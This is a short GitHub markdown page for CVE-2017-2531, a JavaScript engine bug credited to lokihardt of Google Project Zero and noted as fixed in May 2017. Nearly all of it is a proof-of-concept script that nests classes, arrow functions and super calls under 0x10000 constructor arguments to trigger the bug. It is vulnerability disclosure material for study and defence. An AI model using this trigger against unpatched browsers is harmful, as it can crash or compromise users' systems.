Skip to content

Latest commit

 

History

History
50 lines (37 loc) · 891 Bytes

CVE-2017-2531.md

File metadata and controls

50 lines (37 loc) · 891 Bytes
Raw

CVE-2017-2531

  • Fix: May 2017
  • Credit: lokihardt, Google Project Zero

PoC

let args = new Array(0x10000);
args.fill();
args = args.map((_, i) => 'a' + i).join(', ');

let gun = eval(`(function () {
    class A {

    }

    class B extends A {
        constructor(${args}) {
            () => {
                ${args};
                super();
            };

            class C {
                constructor() {
                }

                trigger() {
                    (() => {
                        super.x;
                    })();
                }
            }

            return new C();
        }
    }

    return new B();
})()`);

for (let i = 0; i < 0x10000; i++)
    gun.trigger();

Reference